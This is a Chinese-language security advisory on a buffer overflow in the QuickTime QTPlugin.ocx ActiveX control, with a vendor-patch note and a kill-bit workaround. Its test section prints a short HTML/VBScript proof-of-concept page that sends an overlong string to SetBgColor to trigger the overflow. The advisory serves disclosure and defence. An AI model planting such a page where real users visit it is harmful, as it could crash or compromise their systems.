发布日期：2008-02-12
更新日期：2008-02-25

受影响系统：

Apple QuickTime Player <= 7.4.1

描述：

---

BUGTRAQ  ID: 27769

Apple QuickTime是一款非常流行的多媒体播放器。

QuickTime所安装的QTPlugin.ocx ActiveX控件在处理畸形参数数据时存在缓冲区溢出漏洞，远程攻击者可能利用此漏洞控制用户系统。

QTPlugin.ocx ActiveX控件没有正确地验证对SetBgColor、SetHREF、SetMovieName、SetTarget和SetMatrix函数的输入，如果用户受骗访问了恶意网页并向这些函数传送了超长字符串的话，就可能触发栈溢出，导致执行任意指令。

<*来源：laurent gaffie （laurent.gaffie@gmail.com）
  
  链接：http://marc.info/?l=bugtraq&m=120291711011123&w=2
*>

测试方法：

---

警 告

以下程序(方法)可能带有攻击性，仅供安全研究与教学之用。使用者风险自负！

<html>
<object classid='clsid:02BF25D5-8C17-4B23-BC80-D3488ABDDC6B' id='foo' ></object>
<input type="button" value="Hit me" language="VBScript" OnClick="test()">
<script language="VBScript">
sub test()
bar = String(515305, "A")
foo.SetBgColor bar
End Sub
</script>
</html>

建议：

---

临时解决方法：

* 为clsid 02BF25D5-8C17-4B23-BC80-D3488ABDDC6B设置kill bit。

厂商补丁：

Apple
-----
目前厂商还没有提供补丁或者升级程序，我们建议使用此软件的用户随时关注厂商的主页以获取最新版本：

http://www.apple.com

浏览次数：4550
严重程度：0（网友投票）